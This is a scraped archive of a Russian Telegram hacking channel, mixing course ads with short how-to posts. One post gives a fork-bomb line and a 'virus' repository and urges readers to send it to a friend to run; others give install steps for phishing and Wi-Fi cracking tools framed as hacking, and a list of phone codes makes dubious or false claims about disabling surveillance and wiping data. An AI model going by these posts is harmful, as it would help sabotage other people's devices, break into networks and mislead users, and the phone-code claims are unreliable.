Quantum
Closed channel
Всё про веб-безопасность, анонимность, хакинг и социальную инженерию. По всем вопросам: @cyberJohnny Вся представленная информация строго в ознакомительных целях
Show more5 595
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
5 595
Кто такой руководитель поддержки пользователей в IT? Нужна ли вам эта должность? Поможем разобраться и найти для себя ответ на демо-занятии 20 мая в OTUS!
💬 Поговорим, чем придется заниматься и как сделать жизнь лучше и проще или хотя бы понятнее.
Научимся:
• Считать время и деньги
• Обосновывать свои инициативы
• Поймем «моё ли это?»
(Спойлер❗️) Когда все вокруг хотят от вас всего и вчера — это поначалу ничего, кроме недоумения, не вызывает. На вебинаре поговорим о том, как работать в такой обстановке, сохраняя время и нервы. Систематизация, классификация и автоматизация работы службы поддержки.
После демо-занятия вы сможете продолжить обучение на онлайн-курсе «Руководитель поддержки пользователей в IT» по спец.цене.
Регистрируйтесь на занятие и подключайтесь! 👉 https://otus.pw/AU4J/
5 595
Создание Fork-бомбы в Termux
Fork-бомба — вредоносная или ошибочно написанная программа, бесконечно создающая свои копии, которые обычно также начинают создавать свои копии и т. д.
Установка:
▪️
apt update
▪️apt upgrade
▪️apt install git
▪️git clone https://github.com/Terror696/Vitus2.0
▪️cd Vitus2.0
▪️cp VirtualXposed.apk /sdcard/
Всё,теперь осталось скинуть вирус вашему другу, и ждать реакции)
Так-же бомбу можно сделать самому, для того-же Termux или Linux для этого:
▪️pkg install nano
▪️nano fork.sh
Вставляем следующее:
▪️# :(){ :|:& };:
Скидываем другу и просим запустить.
На этом всё!5 595
Social-Engineer Toolkit – лучший инструмент для СИ
SET – это инструмент, который позволяет выполнять различные атаки c применением социальной инженерии: автоматизировать выполнение атак, создавать скрытый вредоносный код на фишинг сайтах, генерировать фейковые сообщения электронной почты, маскировать вредоносные веб-страницы и много чего другого.
Установка:
$
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
$ cd setoolkit
$ python setup.py
Использование:
$ setoolkit
Инструмент имеет множество различных векторов атаки и прост в использовании.5 595
Взлом Wi-Fi через Kali Linux
Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Рекомендую установить этот дистрибутив на виртуальной машине или прямо на компьютере с обновлением загрузочной записи и возможностью выбора операционной системы. В целом, Wifite2 можно установить в любом другом дистрибутиве, но я предполагаю, что у вас Kali Linux. Ведь он является самым распространенным.
Если Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. В терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции:
git clone https://github.com/derv82/wifite2.git
cd wifite2
ls
sudo python setup.py install
Запуск
./Wifite.py
Теперь введите команду wifite -h для подробной информации по использованию ✌️5 595
Как получить временный email?
Ситуаций, когда может понадобиться временная почта, очень много. Cамая банальная - это анонимность. Temp-Mail - это самый продвинутый и популярный сервис для получения временной почты.
Для доступа к большинству интернет-ресурсам, пользователю необходимо зарегистрироваться. Практически во всех случаях для регистрации используется почта. Но вводя свой реальный адрес электронной почты на сомнительных сайтах, пользователь подвергает себя опасности.
Чтобы получить временный электронной адрес, достаточно лишь зайти на сайт temp-mail.org. Сразу будет сгенерирован email, на который можно принимать письма. Так же у сервиса присутствуют приложения на iOS и Android устройства.
5 595
Как получить временный email?
Ситуаций, когда может понадобиться временная почта, очень много. Cамая банальная - это анонимность. Temp-Mail - это самый продвинутый и популярный сервис для получения временной почты.
Для доступа к большинству интернет-ресурсам, пользователю необходимо зарегистрироваться. Практически во всех случаях для регистрации используется почта. Но вводя свой реальный адрес электронной почты на сомнительных сайтах, пользователь подвергает себя опасности.
Чтобы получить временный электронной адрес, достаточно лишь зайти на сайт temp-mail.org. Сразу будет сгенерирован email, на который можно принимать письма. Так же у сервиса присутствуют приложения на iOS и Android устройства.
5 595
Нейросеть диктора от Mail.ru
dictor.mail.ru — это нейросеть, которая может создать выпуск новостей с детальными под каждого пользователя. От вас требуется лишь текст.
1. Перейдите на указанный сайт.
2. Нажмите "Создать выпуск".
3. Настройте диктора.
4. Введите нужный текст.
5. Нажмите "Создать диктора".
6. Насладитесь приятной анимацией и подождите пока сгенерируется ваш текст :)
7. В редакторе измените видео, если необходимо.
8. Нажмите "Сохранить и поделиться".
Вот что нам удалось создать при помощи данного сервиса.
5 595
Что о вас знают веб-сайты
Сегодня никого нельзя удивить тем фактом, что трекинговые алгоритмы собирают о вас любую доступную информацию. Несмотря на это, большинство пользователей считает это скорее преувеличением, чем фактом. Более того, многие даже понятия не имеют, какую именно информацию собирают трекеры.
Благодаря сервису Cover Your Tracks вы можете узнать, какую информацию о вас и вашем компьютере предоставляет ваш браузер. Данный сервис предоставляет детальный отчёт обо всей информации, благодаря которой вас можно идентифицировать: начиная от всевозможных отпечатков до модели видеокарты и процессора.
Сайт бесплатный и прост в использовании - просто нажмите кнопку "Test your browser", и через несколько секунд получите всю информацию, которую сервис смог узнать о вас. Также обратите внимание на чекбокс под кнопкой - отметив его вы сможете узнать, справляется ли ваш софт с блокировкой реальных трекеров.
5 595
Атакуем беспроводные сети
Shell-скрипт для атаки на беспроводные соединения с использованием встроенных инструментов Kali. Поддерживает WEP, WPS, WPA, WPA2.
Установка в Kali Linux:
◾git clone https://github.com/esc0rtd3w/wifi-hacker
◾cd wifi-hacker
Использование:
◾bash wifi-hacker
◾chmod +x wifi-hacker
◾ ./wifi-hacker
5 595
How Linux Works, 3rd Edition: What Every Superuser Should Know (2021)
Автор: Brian Ward
Количество страниц: 464
В отличие от некоторых операционных систем, Linux не пытается скрыть от вас важные детали - он дает вам полный контроль над вашим компьютером. Но чтобы по-настоящему освоить Linux, вам нужно понимать его внутреннее устройство, например, как система загружается, как работает сеть и что на самом деле делает ядро. В этой книге автор подробно разбирает слои всеми любимой операционной системы. Данное издание было полностью обновлено и расширено.
Во время чтения книги вы узнаете:
✔Как загружается Linux, от загрузчиков до init (systemd);
✔Как ядро управляет устройствами, драйверами устройств и процессами;
✔Как работают сети, интерфейсы, брандмауэры и серверы;
✔Как работают инструменты разработки и их связь с общими библиотеками;
✔Как писать эффективные скрипты.
Достоинства:
➕Актуальность материала;
➕Хороший авторский стиль.
Недостатки:
➖Не замечено.
5 595
"Секретные" коды для телефона
Недавно наткнулся на интересные коды для смартфонов, которые показывают довольно полезные вещи.
Например, с помощью простого кода можно узнать,прослушивают ваш телефон или нет, узнать IMEI смартфона, произвести полное удаление всех файлов и тд.
И все это можно провернуть за 10 секунд.
Для всех смартфонов:
▬ #21# - проверьте, происходит ли переадресация ваших звонков и сообщения на другие номера(проверка на слежку)
▬ #06# - показывает IMEI телефона(зная можно отследить телефон)
▬ #62# - узнаем, куда идет переадресация
Если в первом пункте с голосовой почтой будет номер, не пугайтесь-это ваш оператор
▬ ##002# - отключаем слежку полностью.
Для Android:
▬ ##7780## - удаляет все приложения
▬ 27673855# - сброс настроек до заводских
▬ ##34971539## - полная информация о камере и телефоне.
▬ #5376# - удаление всех SMS.
5 595
Анонимно переписываемся используя Termux
IRSSI — это консольная утилита для обмена сообщениями в режиме реального времени по протоколу IRC. Данный протокол позволяет общаться через личные сообщения и обмениваться любыми файлами. IRSSI очень прост использовании и легко расширяемый с помощью различных плагинов.
Установка:
$ apt update && apt upgrade
$ apt install openssh irssi
Использование:
$ irssi
$ /connect chat.freenode.com
Основные команды:
$ /server hostname port — Подключение к серверу.
$ /join #channel — Войти на канал.
$ /nick nick — Ваше имя в чате.
$ /part #channel — Покинуть канал.
$ /ignore nick — Полностью игнорировать все сообщения от человека.
$ /query nick — Открыть чат с человеком.
$ /names #channel — Посмотреть, кто есть на канале.
$ /quit — Выйти из irssi, закрыв все соединения.
5 595
MPP-базы — необходимый элемент в инструментарии современного Data Engineer. Это отраслевой стандарт для хранения Больших Данных и решения разнообразных аналитических задач на их основе. Сценарии использования mpp-баз разнообразны: они могут быть и «рабочей лошадкой» корпоративного BI, и инструментом централизации данных из сотен источников в одном DWH, и даже использоваться для «горячего» взаимодействия с ML-моделями, работающими в продуктивном окружении.
Познакомьтесь с ними 18 мая на демо-занятии онлайн-курса «Data Engineer» от OTUS. Вебинар проведет Максим Мигутин, эксперт с 5+ лет опыта в индустрии Данных & Аналитики в роли внешнего консультанта (IBM) и in-house лидера Data Engineering и Data Science-проектов. Вместе с ним вы подробно разберете, что же такое mpp-БД, посмотрите, какие решения есть сегодня на рынке, и даже углубитесь в практический пример использования одной их самых инновационных mpp-систем на сегодня: ClickHouse.
Для регистрации и участии в вебинаре, пройдите тест https://otus.pw/3K84/
5 595
Правильно настраиваем TOR на ПК, Android и IOS
Для ПК:
1. Скачиваем браузер с официального сайта.
Устанавливаем и переходим в раздел «Дополнение»:
2. Заходим в настройки расширения «Noscript» и снимаем все галочки которые там есть: script, object, media, frame, font, webgl, fetch, ping, other.
3. Теперь время для эбаутконфика.
В строке пишем about:config, соглашаемся и в строке поиска пишем javascript.enabled. Значение true меняем на false.
Далее в строке поиска пишем network.http.sendRefererHeader и отключаем эту функцию переводя значение с 2 на 0.
И последнее куки: прописываем network.cookie.cookieBehavior и меняем значение на 2.
4. Помимо основного трафика с браузера, компьютер передает ещё информацию о других приложениях. Поэтому, надо пропустить весь трафик через Tor.
Со старой, доброй винды это сделать практически невозможно. А с Linux'a вполне. Открываем терминал и пишем:
•
sudo apt-get update
• sudo apt-get install tor
• sudo systemctl start tor git clone
• https://github.com/ruped24/toriptables2
• cd toriptables2
• sudo mv toriptables2.py /usr/local/bin/
• cd
• sudo toriptables2.py -l
Мы получили левый IP. Через него и переливается весь трафик.
Готово!
С пк разобрались. Теперь переходим к нашим братьям меньшим, а именно к смартфонам. Вход через них не сделает вас полностью анонимными, но всё же.
Для IOS:
Скачиваем Onion Browser с App store, устанавливаем и поменяем уровень безопасности на «Золотой».
Для Android:
Скачиваем Orbot и Tor browser с официального сайта. Устанавливаем и включаем расширение Noscript.5 595
🔥Хотите узнать, чем действительно хорош С++ в 2021 году и как выжать максимум из своего железа?
Мы готовы выложить все козыри на стол и приглашаем на бесплатный вебинар "Как писать высоконагруженные приложения на С++", который пройдет 14 мая в 20:00
Кому будет полезно: Руководителям команды разработки / СТО; IT HR;
На данном вебинаре мы обсудим:
– Особенности С++ по сравнению с другими языками
– Оптимизация работы с файлами
– Работа с памятью в Linux
– Привязка потоков к ядрам
👉Вебинар бесплатный, нужно только оставить заявку по ссылке https://otus.pw/L6PG/
5 595
Хуже нерабочей сборки только сборка, которая работает неправильно. #жиза🔫?
Разработчики и программисты! Подписывайтесь на новый годный канал ProgZilla -
Тут всегда найдется жизненный мем😅 и защита от врага💊
А еще книжные инсайты, полезные обновления и обучающие статьи📚 (конечно, в свободное от издержек профессии время).
Погнали в: @prog_zilla
5 595
Как делать поиск по тексту на скриншотах
Если вы привыкли делать скриншоты каждый раз, когда вам нужно быстро поделится информацией или просто её сохранить - вы наверняка знаете, как сложно со временем становится найти нужный скриншот. Разработчики из Mozilla решили упростить эту задачу для владельцев смартфонов с Android, выпустив Firefox ScreenshotGo.
Данное приложение позволит вам быстро найти нужный скриншот благодаря фильтрации по содержимому тексту - приложение распознаёт текст на всех скриншотах, после чего индексирует каждый скриншот. Кроме того, приложение может показать вам весь текст с выбранного скриншота, а также сортирует все ваши снимки экрана по категориям.
Приложение находится в разработке, поэтому корректно обрабатывается только английский язык - русский язык в качестве ключа для поиска скриншотов приложением пока не поддерживается.
5 595
Подписывайся на канал Danger_Linux - и получай самую свежую информацию из мира Linux, DevOps, Kubernetes, DBA и других непонятных аббревиатур и сокращений😂
Подаем под соусом InfoSECа и этичного хакинга☠️
Годные советы и туториалы, много юмора, видео и анекдотов про взломы и защиты, сисадминство и около него.
@danger_linux
